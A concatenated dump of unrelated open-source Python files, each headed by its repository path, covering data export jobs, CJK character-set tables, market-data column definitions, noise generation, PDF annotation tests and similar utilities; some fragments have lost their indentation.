def export_file_path(exported_file_name) -> str:
"""
Given an export file name returns the path to where that export file should be
put in storage.
:param exported_file_name: The name of the file to generate a path for.
:return: The path where this export file should be put in storage.
"""
return join(settings.EXPORT_FILES_DIRECTORY, exported_file_name)
@staticmethod
def clean_up_old_jobs():
"""
Cleans up expired export jobs, will delete any files in storage for expired
jobs with exported files, will cancel any exporting or pending jobs which have
also expired.
"""
jobs = ExportJob.jobs_requiring_cleanup(timezone.now())
logger.info(f"Cleaning up {jobs.count()} old jobs")
for job in jobs:
if job.exported_file_name:
# Note the django file storage api will not raise an exception if
# the file does not exist. This is ideal as export jobs first save
# their exported_file_name and then write to that file, so if the
# write step fails it is possible that the exported_file_name does not
# exist.
default_storage.delete(
ExportHandler.export_file_path(job.exported_file_name)
)
job.exported_file_name = None
job.status = EXPORT_JOB_EXPIRED_STATUS
job.save()
def _raise_if_invalid_view_or_table_for_exporter(
exporter_type: str, view: Optional[View]
):
"""
Raises an exception if the exporter_type does not support the provided view,
    or, when no view is provided, if the exporter does not support exporting just the
table.
:param exporter_type: The exporter type to check.
:param view: None if we are exporting just the table, otherwise the view we are
exporting.
"""
exporter = table_exporter_registry.get(exporter_type)
if not exporter.can_export_table and view is None:
raise TableOnlyExportUnsupported()
if view is not None:
view_type = view_type_registry.get_by_model(view.specific_class)
if view_type.type not in exporter.supported_views:
raise ViewUnsupportedForExporterType()
def _cancel_unfinished_jobs(user):
"""
Will cancel any in progress jobs by setting their status to cancelled. Any
tasks currently running these jobs are expected to periodically check if they
have been cancelled and stop accordingly.
:param user: The user to cancel all unfinished jobs for.
:return The number of jobs cancelled.
"""
jobs = ExportJob.unfinished_jobs(user=user)
return jobs.update(status=EXPORT_JOB_CANCELLED_STATUS)
def _mark_job_as_finished(export_job: ExportJob) -> ExportJob:
"""
Marks the provided job as finished with the result being the provided file name.
:param export_job: The job to update to be finished.
:return: The updated finished job.
"""
export_job.status = EXPORT_JOB_COMPLETED_STATUS
export_job.progress_percentage = 1.0
export_job.save()
return export_job
def _mark_job_as_failed(job, e):
"""
Marks the given export job as failed and stores the exception in the job.
:param job: The job to mark as failed
:param e: The exception causing the failure
:return: The updated failed job.
"""
job.status = EXPORT_JOB_FAILED_STATUS
job.progress_percentage = 0.0
job.error = str(e)
job.save()
return job
def _open_file_and_run_export(job: ExportJob) -> ExportJob:
"""
Using the jobs exporter type exports all data into a new file placed in the
default storage.
:return: An updated ExportJob instance with the exported_file_name set.
"""
exporter: TableExporter = table_exporter_registry.get(job.exporter_type)
exported_file_name = _generate_random_file_name_with_extension(
exporter.file_extension
)
storage_location = ExportHandler.export_file_path(exported_file_name)
# Store the file name before we even start exporting so if the export fails
# and the file has been made we know where it is to clean it up correctly.
job.exported_file_name = exported_file_name
job.status = EXPORT_JOB_EXPORTING_STATUS
job.save()
with _create_storage_dir_if_missing_and_open(storage_location) as file:
queryset_serializer_class = exporter.queryset_serializer_class
if job.view is None:
serializer = queryset_serializer_class.for_table(job.table)
else:
serializer = queryset_serializer_class.for_view(job.view)
serializer.write_to_file(
PaginatedExportJobFileWriter(file, job), **job.export_options
)
return job
def _generate_random_file_name_with_extension(file_extension):
return str(uuid.uuid4()) + file_extension
def _create_storage_dir_if_missing_and_open(storage_location) -> BinaryIO:
"""
Attempts to open the provided storage location in binary overwriting write mode.
If it encounters a FileNotFound error will attempt to create the folder structure
    leading up to the storage location and then open again.
:param storage_location: The storage location to open and ensure folders for.
:return: The open file descriptor for the storage_location
"""
try:
return default_storage.open(storage_location, "wb+")
except FileNotFoundError:
        # django's file system storage will not attempt to create a missing
# EXPORT_FILES_DIRECTORY and instead will throw a FileNotFoundError.
# So we first save an empty file which will create any missing directories
# and then open again.
default_storage.save(storage_location, BytesIO())
return default_storage.open(storage_location, "wb")
|
bin/process_all.py | seralf/tate_collection | 330 | 12718054 | '''
Go through all artwork jsons and produce an index for
level0, level1, level2
Outputs a json collection
Does not preserve relationships between the levels
'''
import json
from os import walk
# use dict to elimiate duplicated entries as new entries
# are added as {'value of id': 'value of name'}
level0 = {}
level1 = {}
level2 = {}
def open_files(targetpath):
for dirname, dirnames, filenames in walk(targetpath):
for filename in filenames:
filepath = '/'.join([dirname,filename])
            # json.load handles the decoding itself; the old str.decode('utf-8')
            # call only worked on Python 2.
            with open(filepath, encoding='utf-8') as fileopen:
                jsonopen = json.load(fileopen)
get_all_subjects(jsonopen)
def get_all_subjects(jsonfile):
subjectcount = jsonfile['subjectCount']
    if subjectcount != 0:
subjects0 = jsonfile['subjects']['children']
for child in subjects0:
subjects1 = child['children']
level0[child['id']] = child['name']
for child in subjects1:
subjects2 = child['children']
level1[child['id']] = child['name']
for child in subjects2:
level2[child['id']] = child['name']
def write_file(data, filename):
jsondata = json.dumps(data,sort_keys = True,separators = (',',':'))
    with open('../processed/' + filename,'w') as output:
        output.write(jsondata)
open_files('../artworks')
write_file(level0,'level0.json')
write_file(level1,'level1.json')
write_file(level2,'level2.json') |
global_var.py | NightFurySL2001/CJK-character-count | 125 | 12718074 | global cjk_list
global unicode_list
global cjk_jian_list
global cjk_jian_fan_list
global cjk_fan_list
global cjk_count
global unicode_count
import os, sys
global main_directory
#if packaged by pyinstaller
#ref: https://stackoverflow.com/questions/404744/determining-application-path-in-a-python-exe-generated-by-pyinstaller
if getattr(sys, 'frozen', False):
#change from loading same folder to full folder, --onedir
main_directory = os.path.dirname(sys.executable)
#`pyinstaller --onefile` change to use the following code
#if '_MEIPASS2' in os.environ:
# main_directory = os.environ['_MEIPASS2']
#ref: https://stackoverflow.com/questions/9553262/pyinstaller-ioerror-errno-2-no-such-file-or-directory
else:
#dev mode
try: #py xx.py
app_full_path = os.path.realpath(__file__)
main_directory = os.path.dirname(app_full_path)
except NameError: #py then run code
main_directory = os.getcwd()
#english name
#old list for compatibility
cjk_list = {"gb2312":"GB/T 2312",
"gb12345":"GB/T 12345",
"gbk":"GBK",
"gb18030":"GB 18030",
"hanyi-jianfan":"Hanyi Fonts Simp./Trad. List",
"fangzheng-jianfan":"FounderType Simp./Trad. List",
"tongyong-guifan":"Table of General Standard Chinese Characters", #通用规范汉字表
"3500changyong":"List of Frequently Used Characters in Modern Chinese", #现代汉语常用字表
"7000tongyong":"List of Commonly Used Characters in Modern Chinese", #现代汉语通用字表
"yiwu-jiaoyu":"List of Frequently Used Characters of Compulsory Education", #义务教育语文课程常用字表
"4808changyong":"Chart of Standard Forms of Common National Characters", #常用国字标准字体表
"6343cichangyong":"Chart of Standard Forms of Less-Than-Common National Characters", #次常用国字标准字体表
"big5changyong":"BIG5 Common Character Set",
"big5":"BIG5",
"hkchangyong":"List of Graphemes of Commonly-Used Chinese Characters", #常用字字形表
"hkscs":"Hong Kong Supplementary Character Set",
"suppchara":"Common Supplementary Characters in Hong Kong (Level 1-6)"
}
cjk_jian_list_en = {"gb2312":"GB/T 2312",
"3500changyong":"List of Frequently Used Characters in Modern Chinese",
"7000tongyong":"List of Commonly Used Characters in Modern Chinese",
"yiwu-jiaoyu":"List of Frequently Used Characters of Compulsory Education",
"tongyong-guifan":"Table of General Standard Chinese Characters"
}
cjk_jian_fan_list_en = {"hanyi-jianfan":"Hanyi Fonts Simp./Trad. List",
"fangzheng-jianfan":"FounderType Simp./Trad. List",
"gbk":"GBK",
"gb18030":"GB 18030"
}
cjk_fan_list_en = {"4808changyong":"Chart of Standard Forms of Common National Characters",
"6343cichangyong":"Chart of Standard Forms of Less-Than-Common National Characters",
"big5changyong":"BIG5 Common Character Set",
"big5":"BIG5",
"hkchangyong":"List of Graphemes of Commonly-Used Chinese Characters",
"hkscs":"Hong Kong Supplementary Character Set",
"suppchara":"Common Supplementary Characters in Hong Kong (Level 1-6)",
"gb12345":"GB/T 12345"
}
unicode_list = {"kangxi":"Kangxi Radicals",
"kangxi-sup":"CJK Radical Supplements",
"zero":"〇",
"basic":"CJK Unified Ideographs",
"ext-a":"CJK Unified Ideographs Extension A",
"compat":"CJK Compatibility Ideographs",
"compat-ideo":" Non-Compatibility (Unified) Ideographs",
"ext-b":"CJK Unified Ideographs Extension B",
"ext-c":"CJK Unified Ideographs Extension C",
"ext-d":"CJK Unified Ideographs Extension D",
"ext-e":"CJK Unified Ideographs Extension E",
"ext-f":"CJK Unified Ideographs Extension F",
"compat-sup":"CJK Compatibility Ideographs Supplement",
"ext-g":"CJK Unified Ideographs Extension G",
"total":"Total Ideographs"
}
#chinese name (simp)
cjk_jian_list_zhs = {"gb2312":"GB/T 2312",
"3500changyong":"现代汉语常用字表*",
"7000tongyong":"现代汉语通用字表",
"yiwu-jiaoyu":"义务教育语文课程常用字表",
"tongyong-guifan":"通用规范汉字表"
}
cjk_jian_fan_list_zhs = {"hanyi-jianfan":"汉仪简繁字表",
"fangzheng-jianfan":"方正简繁字表",
"gbk":"GBK",
"gb18030":"GB 18030"
}
cjk_fan_list_zhs = {"4808changyong":"常用国字标准字体表",
"6343cichangyong":"次常用国字标准字体表",
"big5changyong":"五大码 (Big5) 常用汉字表",
"big5":"五大码 (Big5)",
"hkchangyong":"常用字字形表",
"hkscs":"香港增补字符集 (HKSCS)",
"suppchara":"常用香港外字表 (1-6级)",
"gb12345":"GB/T 12345"
}
unicode_list_zhs = {"kangxi":"康熙部首",
"kangxi-sup":"汉字部首补充",
"zero":"〇",
"basic":"中日韩统一表意文字",
"ext-a":"中日韩统一表意文字—扩展A区",
"compat":"中日韩兼容表意文字",
"compat-ideo":" 非兼容(统一)表意文字",
"ext-b":"中日韩统一表意文字—扩展B区",
"ext-c":"中日韩统一表意文字—扩展C区",
"ext-d":"中日韩统一表意文字—扩展D区",
"ext-e":"中日韩统一表意文字—扩展E区",
"ext-f":"中日韩统一表意文字—扩展F区",
"compat-sup":"中日韩兼容表意文字(补充区)",
"ext-g":"中日韩统一表意文字—扩展G区",
"total":"总汉字数"
}
#chinese name (trad)
cjk_fan_list_zht = {"4808changyong":"常用國字標準字體表",
"6343cichangyong":"次常用國字標準字體表",
"big5changyong":"五大碼 (Big5) 常用漢字表",
"big5":"五大碼 (Big5)",
"hkchangyong":"常用字字形表",
"hkscs":"香港增補字符集 (HKSCS)",
"suppchara":"常用香港外字表 (1-6級)",
"gb12345":"GB/T 12345"
}
cjk_jian_fan_list_zht = {"hanyi-jianfan":"漢儀簡繁字表",
"fangzheng-jianfan":"方正簡繁字表",
"gbk":"GBK",
"gb18030":"GB 18030"
}
cjk_jian_list_zht = {"gb2312":"GB/T 2312",
"3500changyong":"現代漢語常用字表",
"7000tongyong":"現代漢語通用字表",
"yiwu-jiaoyu":"義務教育語文課程常用字表",
"tongyong-guifan":"通用規範漢字表"
}
unicode_list_zht = {"kangxi":"康熙部首",
"kangxi-sup":"漢字部首補充",
"zero":"〇",
"basic":"中日韓統一表意文字",
"ext-a":"中日韓統一表意文字—擴展A區",
"compat":"中日韓兼容表意文字",
"compat-ideo":" 非兼容(統一)表意文字",
"ext-b":"中日韓統一表意文字—擴展B區",
"ext-c":"中日韓統一表意文字—擴展C區",
"ext-d":"中日韓統一表意文字—擴展D區",
"ext-e":"中日韓統一表意文字—擴展E區",
"ext-f":"中日韓統一表意文字—擴展F區",
"compat-sup":"中日韓兼容表意文字(補充區)",
"ext-g":"中日韓統一表意文字—擴展G區",
"total":"總漢字數"
}
#character count
cjk_count = {"gb2312":6763,
"gb12345":6866,
"gbk":20923,
"gb18030":0,
"hanyi-jianfan":9169,
"fangzheng-jianfan":9664,
"tongyong-guifan":8105,
"3500changyong":3500,
"7000tongyong":7000,
"yiwu-jiaoyu":3500,
"4808changyong":4808,
"6343cichangyong":6343,
"big5changyong":5401,
"big5":13060,
"hkchangyong":4825,
"hkscs":4603,
"suppchara":1097
}
unicode_count = {"kangxi":214,
"kangxi-sup":115,
"zero":1,
"basic":20992,
"ext-a":6592,
"compat":472,
"compat-ideo":12,
"ext-b":42720,
"ext-c":4153,
"ext-d":222,
"ext-e":5762,
"ext-f":7473,
"compat-sup":542,
"ext-g":4939,
"total":0
}
cjk_count["gb18030"] = unicode_count["zero"]+unicode_count["basic"]+unicode_count["ext-a"]
unicode_count["total"] = unicode_count["zero"]+unicode_count["compat-ideo"]+unicode_count["basic"]+unicode_count["ext-a"]+unicode_count["ext-b"]+unicode_count["ext-c"]+unicode_count["ext-d"]+unicode_count["ext-e"]+unicode_count["ext-f"]+unicode_count["ext-g"] |
TaobaoCrawler(new)/save_mysql_redis.py | wangbl11/ECommerceCrawlers | 3,469 | 12718116 | import pymysql
import redis
from config import *
def save_mysql_redis(res_list):
pass
|
kornia/augmentation/_3d/geometric/__init__.py | Ishticode/kornia | 418 | 12718155 | from kornia.augmentation._3d.geometric.affine import RandomAffine3D
from kornia.augmentation._3d.geometric.center_crop import CenterCrop3D
from kornia.augmentation._3d.geometric.crop import RandomCrop3D
from kornia.augmentation._3d.geometric.depthical_flip import RandomDepthicalFlip3D
from kornia.augmentation._3d.geometric.horizontal_flip import RandomHorizontalFlip3D
from kornia.augmentation._3d.geometric.perspective import RandomPerspective3D
from kornia.augmentation._3d.geometric.rotation import RandomRotation3D
from kornia.augmentation._3d.geometric.vertical_flip import RandomVerticalFlip3D
|
auto_make.py | xiaodotgua/renderer.gua | 315 | 12718173 | <gh_stars>100-1000
import os
import sys
import time
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
class AutoMake(PatternMatchingEventHandler):
patterns = ["*.h", "*.cpp"]
def process(self, event):
os.system('make osx')
def on_modified(self, event):
self.process(event)
if __name__ == '__main__':
    print(sys.argv)
args = sys.argv[1:]
observer = Observer()
observer.schedule(AutoMake(), path=args[0] if args else '.')
observer.start()
try:
while True:
time.sleep(2)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
tests/config/test_graphics_state.py | sourya-deepsource/pdf-annotate | 137 | 12718189 | # -*- coding: utf-8 -*-
from unittest import TestCase
import pytest
from pdfrw import PdfDict
from pdfrw import PdfName
from pdf_annotate.config import constants
from pdf_annotate.config.graphics_state import GraphicsState
class TestGraphicsState(TestCase):
def test_blank(self):
pdf_dict = GraphicsState().as_pdf_dict()
assert len(pdf_dict) == 1
assert pdf_dict.Type == PdfName('ExtGState')
def test_graphics_state(self):
state = GraphicsState(
line_width=2,
line_cap=constants.LINE_CAP_ROUND,
line_join=constants.LINE_JOIN_MITER,
miter_limit=1.404,
dash_array=[[1], 0],
stroke_transparency=0.7,
fill_transparency=0.5,
)
pdf_dict = state.as_pdf_dict()
assert pdf_dict == PdfDict(
Type=PdfName('ExtGState'),
LW=2,
LC=1,
LJ=0,
ML=1.404,
D=[[1], 0],
CA=0.7,
ca=0.5,
)
def test_dash_array(self):
with pytest.raises(ValueError):
GraphicsState(dash_array=[1, 1])
with pytest.raises(ValueError):
GraphicsState(dash_array=[[1.5], 1])
with pytest.raises(ValueError):
GraphicsState(dash_array='--- 1')
state = GraphicsState(dash_array=[[2, 1], 1])
assert state.dash_array == [[2, 1], 1]
def test_has_content(self):
assert not GraphicsState().has_content()
assert GraphicsState(line_width=2).has_content()
|
tfne/encodings/codeepneat/__init__.py | githealthy18/Tensorflow-Neuroevolution | 121 | 12718195 | # Import CoDeepNEAT module package
from tfne.encodings.codeepneat import modules
# Import modules
from tfne.encodings.codeepneat.codeepneat_genome import CoDeepNEATGenome
from tfne.encodings.codeepneat.codeepneat_blueprint import CoDeepNEATBlueprint
|
QUANTAXIS/QAData/level2.py | B34nK0/QUANTAXIS | 6,322 | 12718247 |
"""
Field                  Meaning                                          Data type   Notes
SecurityID             Security code                                    STRING
DateTime               Date and time                                    NUMBER      20151123091630
PreClosePx             Previous close price                             NUMBER(3)
OpenPx                 Opening price                                    NUMBER(3)
HighPx                 Highest price                                    NUMBER(3)
LowPx                  Lowest price                                     NUMBER(3)
LastPx                 Latest price                                     NUMBER(3)
TotalVolumeTrade       Total traded volume                              NUMBER      stocks: shares; funds: units; bonds: lots; index: lots
TotalValueTrade        Total traded value                               NUMBER(2)   yuan
InstrumentStatus       Trading status                                   STRING
BidPrice[10]           Ten bid prices                                   NUMBER(3)
BidOrderQty[10]        Ten bid quantities                               NUMBER
BidNumOrders[10]       Actual number of orders at the ten bid levels    NUMBER
BidOrders[50]          First 50 orders at the best bid                  NUMBER
OfferPrice[10]         Ten ask prices                                   NUMBER(3)
OfferOrderQty[10]      Ten ask quantities                               NUMBER
OfferNumOrders[10]     Actual number of orders at the ten ask levels    NUMBER
OfferOrders[50]        First 50 orders at the best ask                  NUMBER
NumTrades              Number of trades                                 NUMBER
IOPV                   ETF indicative net asset value (IOPV)            NUMBER(3)
TotalBidQty            Total buy order quantity                         NUMBER      stocks: shares; funds: units; bonds: lots
TotalOfferQty          Total sell order quantity                        NUMBER      stocks: shares; funds: units; bonds: lots
WeightedAvgBidPx       Weighted average bid price                       NUMBER(3)
WeightedAvgOfferPx     Weighted average offer price                     NUMBER(3)
TotalBidNumber         Total number of buy orders                       NUMBER
TotalOfferNumber       Total number of sell orders                      NUMBER
BidTradeMaxDuration    Maximum waiting time for a buy trade             NUMBER
OfferTradeMaxDuration  Maximum waiting time for a sell trade            NUMBER
NumBidOrders           Number of bid price levels with orders           NUMBER
NumOfferOrders         Number of ask price levels with orders           NUMBER
WithdrawBuyNumber      Number of cancelled buy orders                   NUMBER
WithdrawBuyAmount      Cancelled buy order quantity                     NUMBER
WithdrawBuyMoney       Cancelled buy order value                        NUMBER(2)
WithdrawSellNumber     Number of cancelled sell orders                  NUMBER
WithdrawSellAmount     Cancelled sell order quantity                    NUMBER
WithdrawSellMoney      Cancelled sell order value                       NUMBER(2)
ETFBuyNumber           Number of ETF creation (subscription) orders     NUMBER
ETFBuyAmount           ETF creation quantity                            NUMBER
ETFBuyMoney            ETF creation value                               NUMBER(2)
ETFSellNumber          Number of ETF redemption orders                  NUMBER
ETFSellAmount          ETF redemption quantity                          NUMBER
ETFSellMoney           ETF redemption value                             NUMBER(2)
"""
"""
SecurityID    Security code              STRING
TradeTime     Trade time                 NUMBER     2015112309163002
                                                    (accurate to 1/100 of a second)
TradePrice    Trade price                NUMBER(3)
TradeQty      Trade quantity             NUMBER
TradeAmount   Trade value                NUMBER(3)
BuyNo         Buy-side order number      NUMBER
SellNo        Sell-side order number     NUMBER
TradeIndex    Trade sequence number      NUMBER     in use since 2021-04-26
ChannelNo     Channel code               NUMBER     in use since 2021-04-26
TradeBSFlag   Aggressor (buy/sell) flag  STRING     B - buyer-initiated (active buy)
                                                    S - seller-initiated (active sell)
                                                    N - unknown
                                                    in use since 2021-04-26
BizIndex      Business sequence number   NUMBER     sequential numbering after merging
                                                    with the auction tick-by-tick order
                                                    messages; starts at 1 and is
                                                    continuous per channel
                                                    in use since 2021-04-26
"""
shold_tick_columns = ['TradeTime', 'TradeChannel', 'SendingTime', 'SellNo', 'TradeAmount',
'TradeBSFlag', 'TradeIndex', 'TradePrice', 'TradeQty', 'BuyNo']
shold_snapshot_columns = ['NumTrades', 'OfferTradeMaxDuration', 'ImageStatus', 'TotalBidNumber',
'TotalWarrantExecQty', 'WithdrawSellMoney', 'IOPV', 'BidOrders',
'ETFSellAmount', 'TotalOfferQty', 'WithdrawBuyNumber',
'WeightedAvgOfferPx', 'ETFBuyNumber', 'WarLowerPx', 'MsgSeqNum',
'WithdrawSellAmount', 'ETFSellMoney', 'Volume', 'BidOrderQty', 'OpenPx',
'HighPx', 'PreClosePx', 'LowPx', 'WeightedAvgBidPx', 'ETFSellNumber',
'OfferNumOrders', 'WithdrawSellNumber', 'ETFBuyAmount',
'TotalOfferNumber', 'OfferPrice', 'NumOfferOrders', 'BidPrice',
'OfferOrderQty', 'TotalBidQty', 'SendingTime', 'ETFBuyMoney',
'InstrumentStatus', 'WithdrawBuyAmount', 'ClosePx',
'BidTradeMaxDuration', 'NumBidOrders', 'LastPx', 'Amount', 'AveragePx',
'WarUpperPx', 'YieldToMaturity', 'BidNumOrders', 'WithdrawBuyMoney',
'TradingPhaseCode', 'QuotTime', 'OfferOrders']
sz_snapshot_columns = ['NumTrades', 'OfferNumOrders', 'LowerLimitPx', 'ImageStatus',
'OfferPrice', 'BidPrice', 'BidOrders', 'OfferOrderQty', 'PeRatio2',
'TotalBidQty', 'SendingTime', 'PeRatio1', 'TotalOfferQty', 'ClosePx',
'WeightedAvgPxChg', 'Change2', 'Change1', 'LastPx',
'WeightedAvgOfferPx', 'Amount', 'UpperLimitPx', 'AveragePx',
'TotalLongPosition', 'MsgSeqNum', 'Volume', 'BidNumOrders',
'BidOrderQty', 'TradingPhaseCode', 'QuotTime', 'OpenPx', 'OfferOrders',
'PreWeightedAvgPx', 'HighPx', 'PreClosePx', 'LowPx',
'WeightedAvgBidPx']
sz_order = ['OrderQty', 'OrdType', 'TransactTime', 'ExpirationDays', 'Side',
'ApplSeqNum', 'Contactor', 'SendingTime', 'Price', 'ChannelNo',
'ExpirationType', 'ContactInfo', 'ConfirmID']
sz_tick_columns = ['ApplSeqNum', 'BidApplSeqNum', 'SendingTime', 'Price', 'ChannelNo',
'Qty', 'OfferApplSeqNum', 'Amt', 'ExecType', 'TransactTime']
sh_tick_columns = ['SecurityID', 'TradeTime', 'TradePrice', 'TradeQty', 'TradeAmount',
'BuyNo', 'SellNo', 'TradeIndex', 'ChannelNo', 'TradeBSFlag', 'BizIndex']
sh_snapshot_columns = ['SecurityID', 'DateTime', 'PreClosePx', 'OpenPx', 'HighPx', 'LowPx', 'LastPx',
'TotalVolumeTrade', 'TotalValueTrade', 'InstrumentStatus',
'BidPrice0', 'BidPrice1', 'BidPrice2', 'BidPrice3', 'BidPrice4', 'BidPrice5', 'BidPrice6', 'BidPrice7', 'BidPrice8', 'BidPrice9',
'BidOrderQty0', 'BidOrderQty1', 'BidOrderQty2', 'BidOrderQty3', 'BidOrderQty4', 'BidOrderQty5', 'BidOrderQty6', 'BidOrderQty7', 'BidOrderQty8', 'BidOrderQty9',
'BidNumOrders0', 'BidNumOrders1', 'BidNumOrders2', 'BidNumOrders3', 'BidNumOrders4', 'BidNumOrders5', 'BidNumOrders6', 'BidNumOrders7', 'BidNumOrders8', 'BidNumOrders9',
'BidOrders0', 'BidOrders1', 'BidOrders2', 'BidOrders3', 'BidOrders4', 'BidOrders5', 'BidOrders6', 'BidOrders7', 'BidOrders8', 'BidOrders9',
'BidOrders10', 'BidOrders11', 'BidOrders12', 'BidOrders13', 'BidOrders14', 'BidOrders15', 'BidOrders16', 'BidOrders17', 'BidOrders18', 'BidOrders19',
'BidOrders20', 'BidOrders21', 'BidOrders22', 'BidOrders23', 'BidOrders24', 'BidOrders25', 'BidOrders26', 'BidOrders27', 'BidOrders28', 'BidOrders29',
'BidOrders30', 'BidOrders31', 'BidOrders32', 'BidOrders33', 'BidOrders34', 'BidOrders35', 'BidOrders36', 'BidOrders37', 'BidOrders38', 'BidOrders39',
'BidOrders40', 'BidOrders41', 'BidOrders42', 'BidOrders43', 'BidOrders44', 'BidOrders45', 'BidOrders46', 'BidOrders47', 'BidOrders48', 'BidOrders49',
'OfferPrice0', 'OfferPrice1', 'OfferPrice2', 'OfferPrice3', 'OfferPrice4', 'OfferPrice5', 'OfferPrice6', 'OfferPrice7', 'OfferPrice8', 'OfferPrice9',
'OfferOrderQty0', 'OfferOrderQty1', 'OfferOrderQty2', 'OfferOrderQty3', 'OfferOrderQty4', 'OfferOrderQty5', 'OfferOrderQty6', 'OfferOrderQty7', 'OfferOrderQty8', 'OfferOrderQty9',
'OfferNumOrders0', 'OfferNumOrders1', 'OfferNumOrders2', 'OfferNumOrders3', 'OfferNumOrders4', 'OfferNumOrders5', 'OfferNumOrders6', 'OfferNumOrders7', 'OfferNumOrders8', 'OfferNumOrders9',
'OfferOrders0', 'OfferOrders1', 'OfferOrders2', 'OfferOrders3', 'OfferOrders4', 'OfferOrders5', 'OfferOrders6', 'OfferOrders7', 'OfferOrders8', 'OfferOrders9',
'OfferOrders10', 'OfferOrders11', 'OfferOrders12', 'OfferOrders13', 'OfferOrders14', 'OfferOrders15', 'OfferOrders16', 'OfferOrders17', 'OfferOrders18', 'OfferOrders19',
'OfferOrders20', 'OfferOrders21', 'OfferOrders22', 'OfferOrders23', 'OfferOrders24', 'OfferOrders25', 'OfferOrders26', 'OfferOrders27', 'OfferOrders28', 'OfferOrders29',
'OfferOrders30', 'OfferOrders31', 'OfferOrders32', 'OfferOrders33', 'OfferOrders34', 'OfferOrders35', 'OfferOrders36', 'OfferOrders37', 'OfferOrders38', 'OfferOrders39',
'OfferOrders40', 'OfferOrders41', 'OfferOrders42', 'OfferOrders43', 'OfferOrders44', 'OfferOrders45', 'OfferOrders46', 'OfferOrders47', 'OfferOrders48', 'OfferOrders49',
'NumTrades', 'IOPV', 'TotalBidQty', 'TotalOfferQty', 'WeightedAvgBidPx', 'WeightedAvgOfferPx', 'TotalBidNumber',
'TotalOfferNumber', 'BidTradeMaxDuration', 'OfferTradeMaxDuration', 'NumBidOrders', 'NumOfferOrders',
'WithdrawBuyNumber', 'WithdrawBuyAmount', 'WithdrawBuyMoney', 'WithdrawSellNumber', 'WithdrawSellAmount', 'WithdrawSellMoney',
'ETFBuyNumber', 'ETFBuyAmount', 'ETFBuyMoney', 'ETFSellNumber', 'ETFSellAmount', 'ETFSellMoney']
def maketime(time):
time = str(time)
return time[0:4]+'-'+time[4:6]+'-' + time[6:8] + ' '+time[8:10]+':'+time[10:12]+':'+time[12:14]
def maketime_tick(time):
time = str(time)
return time[0:4]+'-'+time[4:6]+'-' + time[6:8] + ' '+time[8:10]+':'+time[10:12]+':'+time[12:14]+'.' + time[14:]
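if __name__ == "__main__":
    # Ad-hoc sketch (not part of QUANTAXIS itself): label a raw record with the
    # column lists above and check the timestamp helpers. ``raw_row`` is a
    # placeholder; a real row would come from the level-2 feed.
    raw_row = [None] * len(sh_tick_columns)
    print(dict(zip(sh_tick_columns, raw_row)))
    print(maketime(20151123091630))         # -> 2015-11-23 09:16:30
    print(maketime_tick(2015112309163002))  # -> 2015-11-23 09:16:30.02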
|
runway/config/models/__init__.py | avosper-intellaegis/runway | 134 | 12718299 | <reponame>avosper-intellaegis/runway
"""Runway & CFNgin config models."""
|
util/pynoise/base_noise.py | Reytuag/non-stationary_texture_syn | 351 | 12718302 | import constants
def _integer_surround(number):
"""Return the 2 closest integers to number, smaller integer first."""
if number > 0:
return int(number), int(number) + 1
else:
return int(number) - 1, int(number)
def _interpolate(first, second, between):
return first + (second - first) * between
def _cubic_scurve(value):
return value * value * (3.0 - 2.0 * value)
def _quintic_scurve(value):
return (6.0 * value ** 5) - (15.0 * value ** 4) + (10.0 * value ** 3)
def _get_vector(x, y, z, seed):
index = (
constants.x_noise * x +
constants.y_noise * y +
constants.z_noise * z +
constants.seed * seed
)
index ^= index >> 8 # xorshift random
return constants.vectors[index % len(constants.vectors)]
def noise_vector(x, y, z, int_x, int_y, int_z, seed_offset):
vector = _get_vector(int_x, int_y, int_z, seed_offset)
diff_vector = (x - int_x, y - int_y, z - int_z)
return (
vector[0] * diff_vector[0] +
vector[1] * diff_vector[1] +
vector[2] * diff_vector[2]
)
def noise_gradients(x, y, z, seed_offset):
unit_x = _integer_surround(x)
unit_y = _integer_surround(y)
unit_z = _integer_surround(z)
x_decimal = _cubic_scurve(x - unit_x[0])
y_decimal = _cubic_scurve(y - unit_y[0])
z_decimal = _cubic_scurve(z - unit_z[0])
n000 = noise_vector(x, y, z, unit_x[0], unit_y[0], unit_z[0], seed_offset)
n100 = noise_vector(x, y, z, unit_x[1], unit_y[0], unit_z[0], seed_offset)
n010 = noise_vector(x, y, z, unit_x[0], unit_y[1], unit_z[0], seed_offset)
n110 = noise_vector(x, y, z, unit_x[1], unit_y[1], unit_z[0], seed_offset)
n001 = noise_vector(x, y, z, unit_x[0], unit_y[0], unit_z[1], seed_offset)
n101 = noise_vector(x, y, z, unit_x[1], unit_y[0], unit_z[1], seed_offset)
n011 = noise_vector(x, y, z, unit_x[0], unit_y[1], unit_z[1], seed_offset)
n111 = noise_vector(x, y, z, unit_x[1], unit_y[1], unit_z[1], seed_offset)
interp1 = _interpolate(n000, n100, x_decimal)
interp2 = _interpolate(n010, n110, x_decimal)
interp3 = _interpolate(n001, n101, x_decimal)
interp4 = _interpolate(n011, n111, x_decimal)
interp5 = _interpolate(interp1, interp2, y_decimal)
interp6 = _interpolate(interp3, interp4, y_decimal)
return _interpolate(interp5, interp6, z_decimal)
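if __name__ == "__main__":
    # Quick manual check (assumes the sibling ``constants`` module with its
    # noise seeds and gradient-vector table is importable, as in the package).
    print(noise_gradients(1.3, 2.7, 0.5, seed_offset=0))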
|
AppServer/lib/django-1.4/tests/regressiontests/special_headers/urls.py | loftwah/appscale | 790 | 12718310 | # coding: utf-8
from __future__ import absolute_import
from django.conf.urls import patterns
from django.views.generic.list_detail import object_detail
from . import views
from .models import Article
urlpatterns = patterns('',
(r'^special_headers/article/(?P<object_id>\d+)/$', object_detail, {'queryset': Article.objects.all()}),
(r'^special_headers/xview/func/$', views.xview_dec(views.xview)),
(r'^special_headers/xview/class/$', views.xview_dec(views.XViewClass.as_view())),
)
|
nni/nas/pytorch/base_trainer.py | dutxubo/nni | 9,680 | 12718328 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC, abstractmethod
class BaseTrainer(ABC):
@abstractmethod
def train(self):
"""
Override the method to train.
"""
raise NotImplementedError
@abstractmethod
def validate(self):
"""
Override the method to validate.
"""
raise NotImplementedError
@abstractmethod
def export(self, file):
"""
Override the method to export to file.
Parameters
----------
file : str
File path to export to.
"""
raise NotImplementedError
@abstractmethod
def checkpoint(self):
"""
Override to dump a checkpoint.
"""
raise NotImplementedError
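# Implementation sketch (hypothetical subclass, not part of NNI): a concrete
# trainer only needs to fill in the four abstract hooks, e.g.
#   class MyTrainer(BaseTrainer):
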